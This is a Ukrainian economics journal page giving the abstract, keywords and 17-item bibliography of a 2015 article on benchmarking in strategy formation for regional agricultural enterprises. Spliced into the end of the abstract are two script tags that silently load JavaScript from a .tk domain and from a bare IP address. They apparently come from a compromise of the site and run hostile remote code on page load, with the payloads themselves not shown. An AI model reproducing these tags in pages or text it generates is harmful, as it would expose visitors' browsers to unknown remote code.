ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 005.21/22:631.11
Сторінка молодого науковця

Бенчмаркінг в управлінні формуванням стратегій розвитку сільськогосподарських підприємств регіону / Толстих А. С. // Економіка АПК. - 2015. - № 5 - С. 92

Управління формуванням стратегій розвитку підприємства передбачає детальний аналіз наявної ситуації, визначення місії існування підприємства, обґрунтування системи стратегічних і операційних цілей, вибір на основі аналізу можливих альтернатив найдоцільніших напрямів їх досягнення. Бенчмаркінг здатний формувати систему операційних цілей у рамках визначеної стратегії розвитку. Важливим завданням постає визначення переліку індикаторів аналізу діяльності сільськогосподарських підприємств для бенчмаркінг-тестування. Бенчмаркінг дає змогу порівняти, за окремими показниками, позиції підприємства серед фірм – конкурентів, структурує інформацію щодо сильних сторін і сфер, які потребують вдосконалення та є важливими для процесу підвищення ефективності. Результати бенчмаркінгу допомагають надати компанії завчасне попередження про її відставання від конкурентів. Рис.: 2. Бібліогр.: 17.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: стратегії розвитку, бенчмаркінг, конкурентний бенчмаркінг, бенчмаркінг-тестування, операційні цілі, індикатори аналізу бенчмаркінгу

Список використаних джерел

 1. Camp R. C., Benchmarking / R. C. Camp // The Search for Industry Best Practices That Lead to Superior Performance – Wisconsin : ASQC Industry Press, Milwaukee, 1989.
 2. Котлер Ф. Маркетинг-менеджмент / Ф. Котлер. – СПб.: Изд-во “Питер Ком”, 1998. – 896 с.
 3. Аакер Д. Стратегическое рыночное управление ; пер. с англ. под. ред. Ю.Н. Каптуревского / Д. Аакер. – СПб.: Питер, 2002. – 544 с.
 4. Андерсен Б. Бизнес – процессы. Инструменты совершенствования ; пер. с англ. ; науч. ред. Ю.П. Адлер / Б. Андерсен. – М.: РИА ”Стандарты и качество”, 2003. – 272 с.
 5. Багиев Г.Л. Маркетинг–статистика: учеб. пособие / Г.Л. Багиев, Е.Л. Богданова; Санкт-Петербургский гос. ун-т экономики и финансов. – СПб.: Изд-во СПбГУЭФ, 1999. –206 с.
 6. Нємцов В.Д. Стратегічний менеджмент : навч. посіб. / В.Д. Нємцов, Л.Є. Довгань. – К.: ТОВ ”УВПК ”ЕксОб”, 2004. – 560 с.
 7. Пашутин С. Бенчмаркинг на выживание. Роль конкурентного анализа в создании преимуществ на рынке / С. Пашутин // Маркетолог. – 2006. – № 6 (80). – С. 24-28.
 8. Щегольська О. Реінжиніринг бізнес- процесів – необхідність в умовах динамічного ринку / О. Щегольська // Управление компанией. – 1999. – № 1-2.
 9. Прус О.М. Бенчмаркінг у підвищенні конкурентоспроможності молокопереробних підприємств: дис. … канд. екон. наук : 08.00.04 / О.М. Прус. – К., 2008. – 222 с.
 10. Прус Л.Р. Управління конкурентоспроможністю вищих навчальних закладів на засадах бенчмаркінгу : автореф. дис. ... канд. екон. наук : 08.00.04 / Л.Р. Прус – Т., 2008. – 20 с.
 11. Маринович В. В. Конкурентний бенчмаркінг у забезпеченні економічної безпеки суб’єктів господарської діяльності. [Електронний ресурс] / В. В. Маринович. – Режим доступу до ресурсу: http://fkd.org.ua.
 12. Метод "Бенчмаркинг" [Електронний ресурс] – Режим доступу до ресурсу: http://www.inventech.ru/pub/methods/metod-0029/.
 13. Бенчмаркінг (порівняльний конкурентний аналіз) [Електронний ресурс] – Режим доступу до ресурсу: http://www.kazedu.kz/referat/172036.
 14. Рішення Про заслуховування звіту про виконання Програми економічного, соціального та культурного розвитку Києво-Святошинського району за 2013 рік [Електронний ресурс] – Режим доступу до ресурсу: http://www.ksrr.gov.ua/files/Session_28_(25.04.2013)/309.pdf.
 15. Lignoleaux F.S. Marketing and Its Ways Of Doing Business. / F.S. Lignoleaux // Materials of the Management Conference 1998 in Limage, France. – Limage, 1998. – p. 61.
 16. Benchmarking enterprise messaging systems [Електронний ресурс] – Режим доступу до ресурсу: http://www.dcs.bbk.ac.uk/~geoff/benchmarking_enterprise_msg_wp.pdf.
 17. What Is Competitive Benchmarking? [Електронний ресурс] – Режим доступу до ресурсу: http://www.wisegeek.com/what-is-competitive-benchmarking.htm.
Читати статтю: 15_05_92-96.pdf